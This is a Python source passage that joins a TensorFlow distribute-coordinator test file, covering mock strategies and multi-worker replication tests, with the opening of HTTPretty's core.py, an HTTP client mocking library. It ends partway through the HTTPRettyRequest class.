if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
    """Minimal stand-in for a distribution strategy, exposing only the
    attributes the coordinator inspects."""

    def __init__(self,
                 between_graph=False,
                 should_init=None,
                 should_checkpoint=None,
                 should_save_summary=None):
        self._between_graph = between_graph
        self._should_init = should_init
        self._should_checkpoint = should_checkpoint
        self._should_save_summary = should_save_summary

    @property
    def between_graph(self):
        return self._between_graph

    def configure(self,
                  session_options=None,
                  cluster_spec=None,
                  task_type=None,
                  task_id=None):
        """Fill in any still-unset should_* flags.

        Task 0 takes on the chief duties (init, checkpointing, summaries);
        flags passed explicitly to the constructor are left untouched.
        """
        del session_options, cluster_spec, task_type

        is_task_zero = task_id == 0
        if self._should_init is None:
            self._should_init = is_task_zero
        if self._should_checkpoint is None:
            self._should_checkpoint = is_task_zero
        if self._should_save_summary is None:
            self._should_save_summary = is_task_zero

    @property
    def should_init(self):
        return self._should_init

    @property
    def should_checkpoint(self):
        return self._should_checkpoint

    @property
    def should_save_summary(self):
        return self._should_save_summary
class MockServer(object):
    """Stand-in for an in-process TF server that records join() calls."""

    def __init__(self):
        self._joined = False

    def join(self):
        """Mark the server as joined; joining twice is a test error."""
        assert not self._joined
        self._joined = True

    @property
    def joined(self):
        # True once join() has been called.
        return self._joined
class DistributeCoordinatorTestBase(test.TestCase):
  """Base class for distribute-coordinator tests.

  Provides a shared in-process cluster, worker functions exercising in-graph
  and between-graph replication, and helpers that dump per-task worker
  context / strategy properties into dicts the test methods inspect.
  """

  @classmethod
  def setUpClass(cls):
    # We have to create a global in-process cluster because once an in-process
    # tensorflow server is created, there is no way to terminate it. Please see
    # multi_worker_test_base.py for more details.
    cls._workers, cls._ps = test_util.create_local_cluster(
        NUM_WORKERS, num_ps=NUM_PS)
    cls._cluster_spec = {
        WORKER: [
            _strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
        ],
        PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
    }

  def setUp(self):
    # The dicts/counters below are written concurrently by worker threads;
    # all writes are guarded by self._lock.
    self._result_correct = 0
    self._lock = threading.Lock()
    self._worker_context = {}
    self._strategy_property = {}
    self._std_servers = {}
    self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)

  @contextlib.contextmanager
  def _test_session(self, target):
    """Yields a Session against `target` with graph optimizations disabled."""
    config = config_pb2.ConfigProto(allow_soft_placement=True)
    config.graph_options.optimizer_options.opt_level = -1
    with session.Session(graph=None, config=config, target=target) as sess:
      yield sess

  def _create_cluster_spec(self,
                           has_chief=False,
                           num_workers=1,
                           num_ps=0,
                           has_eval=False):
    """Builds a cluster spec dict using freshly picked localhost ports."""
    if _portpicker_import_error:
      raise _portpicker_import_error  # pylint: disable=raising-bad-type
    cluster_spec = {}
    if has_chief:
      cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
    if num_workers:
      cluster_spec[WORKER] = [
          "localhost:%s" % portpicker.pick_unused_port()
          for _ in range(num_workers)
      ]
    if num_ps:
      cluster_spec[PS] = [
          "localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
      ]
    if has_eval:
      cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
    return cluster_spec

  def _in_graph_worker_fn(self, strategy):
    """In-graph worker fn: builds one variable per worker and sums them."""
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    with self._test_session(target=context.master_target) as sess:
      xs = []
      expected = 0.0
      for i in range(context.num_workers):
        with ops.device("/job:worker/task:%d" % i):
          x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
          x_add = x.assign_add(float(i))
          xs.append(x_add)
          expected += i + 10.0
      with ops.device("/job:worker/task:0"):
        result = math_ops.add_n(xs)
      variables.global_variables_initializer().run()
      result_value = sess.run(result)
    self.assertEqual(result_value, expected)
    if result_value == expected:
      self._result_correct += 1

  def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
    """Starts run_distribute_coordinator in a thread and returns the thread."""
    t = threading.Thread(
        target=distribute_coordinator.run_distribute_coordinator,
        args=(worker_fn, strategy),
        kwargs=kwargs)
    t.start()
    return t

  def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
                                           cluster_spec, **kwargs):
    """Runs one coordinator thread per task listed in `cluster_spec`."""
    threads = {}
    for task_type in cluster_spec.keys():
      threads[task_type] = []
      for task_id in range(len(cluster_spec[task_type])):
        t = self._run_coordinator_in_thread(
            worker_fn,
            strategy,
            cluster_spec=cluster_spec,
            task_type=task_type,
            task_id=task_id,
            **kwargs)
        threads[task_type].append(t)
    return threads

  def _between_graph_worker_fn(self, strategy):
    """Between-graph worker fn: each worker updates two ps-hosted variables."""
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    with self._test_session(target=context.master_target) as sess:
      with ops.device("/job:ps/task:0"):
        # TODO(yuefengz): investigate why not using resource variable will make
        # the test flaky.
        x = variable_scope.get_variable(
            "x", initializer=10.0, use_resource=True)
      with ops.device("/job:ps/task:1"):
        y = variable_scope.get_variable(
            "y", initializer=20.0, use_resource=True)
      x_add = x.assign_add(2.0)
      y_sub = y.assign_sub(2.0)
      train_op = control_flow_ops.group([x_add, y_sub])
      if context.is_chief:
        variables.global_variables_initializer().run()
        # Synchronize workers after initialization.
        if context.has_barrier:
          context.wait_for_other_workers()
      else:
        # Non-chief workers spin until the chief has initialized everything.
        while True:
          uninit_vars = sess.run(variables.report_uninitialized_variables())
          # pylint: disable=g-explicit-length-test
          if len(uninit_vars) == 0:
            break
      sess.run(train_op)
      # Synchronize workers after one step to make sure they all have finished
      # training.
      if context.has_barrier:
        context.wait_for_other_workers()
      else:
        self._barrier.wait()
      x_val, y_val = sess.run([x, y])
      self.assertEqual(x_val, 16.0)
      self.assertEqual(y_val, 14.0)
      if x_val == 16.0 and y_val == 14.0:
        with self._lock:
          self._result_correct += 1

  def _between_graph_with_monitored_session(self, strategy):
    """Between-graph worker fn relying on MonitoredSession to run init ops."""
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    with ops.device("/job:ps/task:0"):
      # TODO(yuefengz): investigate why not using resource variable will make
      # the test flaky.
      x = variable_scope.get_variable("x", initializer=10.0, use_resource=True)
    with ops.device("/job:ps/task:1"):
      y = variable_scope.get_variable("y", initializer=20.0, use_resource=True)
    x_add = x.assign_add(2.0)
    y_sub = y.assign_sub(2.0)
    train_op = control_flow_ops.group([x_add, y_sub])
    # The monitored session will run init or ready ops.
    with monitored_session.MonitoredSession() as sess:
      sess.run(train_op)
      # Synchronize workers after one step to make sure they all have finished
      # training.
      if context.has_barrier:
        context.wait_for_other_workers()
      else:
        self._barrier.wait()
      x_val, y_val = sess.run([x, y])
    self.assertEqual(x_val, 16.0)
    self.assertEqual(y_val, 14.0)
    if x_val == 16.0 and y_val == 14.0:
      with self._lock:
        self._result_correct += 1

  def _dump_worker_context(self, strategy):
    """Dumps the properties of each worker context.

    It dumps the context properties to a dict mapping from task_type to a list
    of tuples of master_target, num_workers, is_chief and distribute_mode, where
    the list is indexed by the task_id.

    Args:
      strategy: a `DistributionStrategy` object.
    """
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    task_type = str(context.task_type)
    task_id = context.task_id or 0
    with self._lock:
      if task_type not in self._worker_context:
        self._worker_context[task_type] = []
      # Grow the per-type list until task_id is a valid index.
      while len(self._worker_context[task_type]) <= task_id:
        self._worker_context[task_type].append(None)
      self._worker_context[task_type][task_id] = (context.master_target,
                                                  context.num_workers,
                                                  context.is_chief,
                                                  context.distributed_mode)

  def _dump_strategy_property(self, strategy):
    """Records (should_init, should_checkpoint, should_save_summary) per task."""
    context = distribute_coordinator_context.get_current_worker_context()
    self.assertTrue(context is not None)
    # The context must mirror the strategy's properties.
    self.assertEqual(context._strategy.should_init, strategy.should_init)
    self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
    self.assertEqual(context.should_save_summary, strategy.should_save_summary)
    task_type = str(context.task_type)
    task_id = context.task_id or 0
    with self._lock:
      if task_type not in self._strategy_property:
        self._strategy_property[task_type] = []
      while len(self._strategy_property[task_type]) <= task_id:
        self._strategy_property[task_type].append(None)
      self._strategy_property[task_type][task_id] = (
          context._strategy.should_init, context.should_checkpoint,
          context.should_save_summary)

  def _run_mock_std_server(self,
                           session_config=None,
                           cluster_spec=None,
                           task_type=None,
                           task_id=None,
                           rpc_layer=None,
                           environment=None):
    """Mock replacement for _run_std_server that records a MockServer."""
    task_type = str(task_type)
    task_id = task_id or 0
    with self._lock:
      if task_type not in self._std_servers:
        self._std_servers[task_type] = []
      while len(self._std_servers[task_type]) <= task_id:
        self._std_servers[task_type].append(None)
      server = MockServer()
      self._std_servers[task_type][task_id] = server
    return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
  """Tests for the distribute coordinator in standalone client mode."""

  def testInGraphStandaloneMode(self):
    """Test it runs in-graph replication in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._in_graph_worker_fn,
        MockStrategy(between_graph=False),
        cluster_spec=self._cluster_spec)
    self.assertEqual(self._result_correct, 1)

  def testBetweenGraph(self):
    """Test it runs between-graph replication in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._between_graph_worker_fn,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)
    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphWithMonitoredSession(self):
    """Test monitored session in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._between_graph_with_monitored_session,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)
    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)
    # There is only one type of task and there are three such tasks.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))

  def testBetweenGraphStrategyProperties(self):
    # Dumps properties of the strategy objects.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_strategy_property,
        MockStrategy(between_graph=True, should_init=True),
        cluster_spec=self._cluster_spec)
    # There is only one type of task and there are three such tasks.
    self.assertEqual(len(self._strategy_property), 1)
    self.assertTrue(WORKER in self._strategy_property)
    self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
    # Check whether each task has the right properties of should_init,
    # should_checkpoint and should_save_summary.
    self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
    self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
    self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))

  def testInGraphContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=self._cluster_spec)
    # There is only a "None" task in the dumped task context.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(
        self._worker_context["None"][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))

  def testLocalContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=None)
    # There is only a "None" task.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))

  def testBetweenGraphContextWithChief(self):
    # Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
    cluster_spec = copy.deepcopy(self._cluster_spec)
    cluster_spec[CHIEF] = ["fake_chief"]
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=True),
        cluster_spec=cluster_spec,
        rpc_layer="grpc")
    # There are one CHIEF and three workers.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue(CHIEF in self._worker_context)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[CHIEF]), 1)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(self._worker_context[CHIEF][0],
                     ("grpc://fake_chief", 4, True, True))
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))

  def testInGraphContextWithEval(self):
    # Adds a EVALUATOR job.
    cluster_spec = copy.deepcopy(self._cluster_spec)
    cluster_spec[EVALUATOR] = ["fake_evaluator"]
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=cluster_spec,
        rpc_layer=None)
    # There are one "None" task and one EVALUATOR task.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue("None" in self._worker_context)
    self.assertTrue(EVALUATOR in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
        _bytes_to_str(self._workers[0].target)), 3, True, True))
    self.assertEqual(self._worker_context[EVALUATOR][0],
                     ("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestInpendentWorkerMode(
    DistributeCoordinatorTestBase):
  """Tests for the distribute coordinator in independent-worker mode."""

  def testInGraph(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    threads = self._run_multiple_coordinator_in_threads(
        self._in_graph_worker_fn,
        MockStrategy(between_graph=False),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    threads[WORKER][0].join()
    self.assertEqual(self._result_correct, 1)

  def testBetweenGraph(self):
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, num_ps=NUM_PS)
    threads = self._run_multiple_coordinator_in_threads(
        self._between_graph_worker_fn,
        MockStrategy(between_graph=True),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    for task_id in range(NUM_WORKERS):
      threads[WORKER][task_id].join()
    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphWithMonitoredSession(self):
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, num_ps=NUM_PS)
    threads = self._run_multiple_coordinator_in_threads(
        self._between_graph_with_monitored_session,
        MockStrategy(between_graph=True),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    for task_id in range(NUM_WORKERS):
      threads[WORKER][task_id].join()
    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphContext(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=True),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()
    # There is only one type of task and three such tasks.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))
    # Make sure each worker runs a std server.
    self.assertEqual(len(self._std_servers), 1)
    self.assertTrue(WORKER in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertFalse(self._std_servers[WORKER][1].joined)
    self.assertFalse(self._std_servers[WORKER][2].joined)

  def testBetweenGraphStrategyProperties(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps properties of the strategy objects.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_strategy_property,
          MockStrategy(between_graph=True, should_init=True),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()
    # There is only one type of task and there are three such tasks.
    self.assertEqual(len(self._strategy_property), 1)
    self.assertTrue(WORKER in self._strategy_property)
    self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
    # Check whether each task has the right properties of should_init,
    # should_checkpoint and should_save_summary.
    self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
    self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
    self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))

  def testInGraphContext(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=False),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()
    # There is only a "None" task in the dumped task context.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(
        self._worker_context["None"][0],
        (_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
    # Make sure each worker runs a std server. In in-graph mode only the
    # first worker acts as client; the rest just join their servers.
    self.assertEqual(len(self._std_servers), 1)
    self.assertTrue(WORKER in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertTrue(self._std_servers[WORKER][1].joined)
    self.assertTrue(self._std_servers[WORKER][2].joined)

  def testInGraphContextWithEval(self):
    # Adds a EVALUATOR job.
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, has_eval=True)
    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=False),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()
      threads[EVALUATOR][0].join()
    # There are one "None" task and one EVALUATOR task.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue("None" in self._worker_context)
    self.assertTrue(EVALUATOR in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
    # Check whether each task has the right master_target, num_workers, is_chief
    # and distributed_mode.
    self.assertEqual(self._worker_context["None"][0],
                     (_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
    self.assertEqual(self._worker_context[EVALUATOR][0],
                     (cluster_spec[EVALUATOR][0], 3, True, False))
    # Make sure each worker runs a std server.
    self.assertEqual(len(self._std_servers), 2)
    self.assertTrue(WORKER in self._std_servers)
    self.assertTrue(EVALUATOR in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertTrue(self._std_servers[WORKER][1].joined)
    self.assertTrue(self._std_servers[WORKER][2].joined)
    self.assertFalse(self._std_servers[EVALUATOR][0].joined)

  def testRunStdServerInGoogleEnvironment(self):
    cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
    tf_config = {"cluster": cluster_spec, "environment": "google"}
    joined = [False]

    def _fake_sleep(_):
      # The google-environment ps path sleeps in a loop; use the patched
      # sleep to observe it was reached, then exit the thread.
      joined[0] = True
      original_sys_exit(0)

    def _thread_fn(cluster_spec):
      distribute_coordinator.run_distribute_coordinator(
          None,
          None,
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="ps",
          task_id=0)

    with test.mock.patch.dict(
        "os.environ",
        {"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
            time, "sleep", _fake_sleep):
      t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
      t.start()
      t.join()
    self.assertTrue(joined[0])

  def testRpcLayerEnvironmentVariable(self):
    cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
    tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}
    rpc_layer_from_coordinator = [None]

    def _run_mock_server(cluster_spec=None,
                         task_type=None,
                         task_id=None,
                         session_config=None,
                         rpc_layer=None,
                         environment=None):
      # Capture the rpc_layer the coordinator passes to the std server.
      del cluster_spec, task_type, task_id, session_config, environment
      rpc_layer_from_coordinator[0] = rpc_layer
      return MockServer()

    with test.mock.patch.dict(
        "os.environ",
        {"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
            distribute_coordinator, "_run_std_server", _run_mock_server):
      distribute_coordinator.run_distribute_coordinator(
          None,
          None,
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="ps",
          task_id=0)
    self.assertEqual(rpc_layer_from_coordinator[0], "cake")
if __name__ == "__main__":
  # TODO(yuefengz): find a smart way to terminate std server threads.
  # Std server threads block forever in join(); patching sys.exit with
  # os._exit lets the process die without waiting for them.
  with test.mock.patch.object(sys, "exit", os._exit):
    test.main()
|
core.py | # #!/usr/bin/env python
# -*- coding: utf-8 -*-
# <HTTPretty - HTTP client mock for Python>
# Copyright (C) <2011-2018> Gabriel Falcao <gabriel@nacaolivre.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import contextlib
import functools
import hashlib
import inspect
import itertools
import json
import re
import socket
import tempfile
import threading
import traceback
import warnings
from functools import partial
from .compat import (
PY3,
StringIO,
text_type,
binary_type,
BaseClass,
BaseHTTPRequestHandler,
quote,
quote_plus,
urlencode,
encode_obj,
urlunsplit,
urlsplit,
parse_qs,
unquote_utf8,
ClassTypes,
basestring
)
from .http import (
STATUSES,
HttpBaseClass,
parse_requestline,
last_requestline,
)
from .utils import (
utf8,
decode_utf8,
)
from .errors import HTTPrettyError, UnmockedError
from datetime import datetime
from datetime import timedelta
from errno import EAGAIN
# Keep references to the genuine socket/ssl entry points so HTTPretty can
# restore them after monkeypatching and delegate to them for unmocked hosts.
old_socket = socket.socket
old_SocketType = socket.SocketType
old_create_connection = socket.create_connection
old_gethostbyname = socket.gethostbyname
old_gethostname = socket.gethostname
old_getaddrinfo = socket.getaddrinfo
# Optional-dependency originals default to None and are filled in below when
# the corresponding module is importable.
old_socksocket = None
old_ssl_wrap_socket = None
old_sslwrap_simple = None
old_sslsocket = None
old_sslcontext_wrap_socket = None
# Matches anything (including across lines); used as a catch-all pattern.
MULTILINE_ANY_REGEX = re.compile(r'.*', re.M)
# Extracts the host portion of a (possibly regex-anchored) URL string.
hostname_re = re.compile(r'\^?(?:https?://)?[^:/]*[:/]?')
try: # pragma: no cover
    import socks
    old_socksocket = socks.socksocket
except ImportError:
    socks = None
try: # pragma: no cover
    import ssl
    old_ssl_wrap_socket = ssl.wrap_socket
    try:
        # Not available on very old ssl modules.
        old_sslcontext_wrap_socket = ssl.SSLContext.wrap_socket
    except AttributeError:
        pass
    if not PY3:
        old_sslwrap_simple = ssl.sslwrap_simple
    old_sslsocket = ssl.SSLSocket
except ImportError: # pragma: no cover
    ssl = None
try:
    # Vendored urllib3 inside requests also needs its ssl wrapper patched.
    import requests.packages.urllib3.connection as requests_urllib3_connection
    old_requests_ssl_wrap_socket = requests_urllib3_connection.ssl_wrap_socket
except ImportError:
    requests_urllib3_connection = None
# Ports treated as HTTP(S); the POTENTIAL_* sets grow as URIs with explicit
# ports are registered elsewhere in this module.
DEFAULT_HTTP_PORTS = frozenset([80])
POTENTIAL_HTTP_PORTS = set(DEFAULT_HTTP_PORTS)
DEFAULT_HTTPS_PORTS = frozenset([443])
POTENTIAL_HTTPS_PORTS = set(DEFAULT_HTTPS_PORTS)
def FALLBACK_FUNCTION(x):
    """Identity parser used when no content-type specific parser applies."""
    return x
class HTTPrettyRequest(BaseHTTPRequestHandler, BaseClass):
    r"""
    Represents a HTTP request. It takes a valid multi-line,
    ``\r\n`` separated string with HTTP headers and parses them out using
    the internal `parse_request` method.

    It also replaces the `rfile` and `wfile` attributes with StringIO
    instances so that we guarantee that it won't make any I/O, neither
    for writing nor reading.

    It has some convenience attributes:

    ``headers`` -> a mimetype object that can be cast into a dictionary,
    contains all the request headers

    ``method`` -> the HTTP method used in this request

    ``querystring`` -> a dictionary containing lists with the
    attributes. Please notice that if you need a single value from a
    query string you will need to get it manually like:

    .. testcode::

       >>> request.querystring
       {'name': ['Gabriel Falcao']}
       >>> print request.querystring['name'][0]

    ``body`` -> the request body as a string

    ``parsed_body`` -> the request body parsed by ``parse_request_body``
    """

    def __init__(self, headers, body=''):
        # first of all, lets make sure that if headers or body are
        # unicode strings, it must be converted into a utf-8 encoded
        # byte string
        self.raw_headers = utf8(headers.strip())
        self._body = utf8(body)
        # Now let's concatenate the headers with the body, and create
        # `rfile` based on it
        self.rfile = StringIO(b'\r\n\r\n'.join([self.raw_headers, self.body]))
        # Creating `wfile` as an empty StringIO, just to avoid any
        # real I/O calls
        self.wfile = StringIO()
        # parsing the request line preemptively
        self.raw_requestline = self.rfile.readline()
        # initiating the error attributes with None
        self.error_code = None
        self.error_message = None
        # Parse the request based on the attributes above; on a malformed
        # request parse_request() records the error and we bail out early.
        if not self.parse_request():
            return
        # making the HTTP method string available as the command
        self.method = self.command
        # Now 2 convenient attributes for the HTTPretty API:
        # `querystring` holds a dictionary with the parsed query string
        # NOTE(review): str.encode normally raises UnicodeEncodeError, not
        # UnicodeDecodeError — this looks like Python 2 compat; confirm.
        try:
            self.path = self.path.encode('iso-8859-1')
        except UnicodeDecodeError:
            pass
        self.path = decode_utf8(self.path)
        qstring = self.path.split("?", 1)[-1]
        self.querystring = self.parse_querystring(qstring)
        # And the body will be attempted to be parsed as
        # `application/json` or `application/x-www-form-urlencoded`
        """a dictionary containing parsed request body or None if
        HTTPrettyRequest doesn't know how to parse it. It currently
        supports parsing body data that was sent under the
        ``content`-type` headers values: ``application/json`` or
        ``application/x-www-form-urlencoded``
        """
        self.parsed_body = self.parse_request_body(self._body)

    @property
    def body(self):
        # The raw, utf-8 encoded request body.
        return self._body

    @body.setter
    def body(self, value):
        self._body = utf8(value)
        # And the body will be attempted to be parsed as
        # `application/json` or `application/x-www-form-urlencoded`
        self.parsed_body = self.parse_request_body(self._body)

    def __nonzero__(self):
        # Python 2 truthiness hook: a request is truthy when it carries any
        # body or headers.
        return bool(self.body) or bool(self.raw_headers)

    def __str__(self):
        tmpl = '<HTTPrettyRequest("{}", total_headers={}, body_length={})>'
        return tmpl.format(
            self.headers.get('content-type', ''),
            len(self.headers),
            len(self.body),
        )

    def parse_querystring(self, qs):
        """Parses an UTF-8 encoded query string into a dict of string lists.

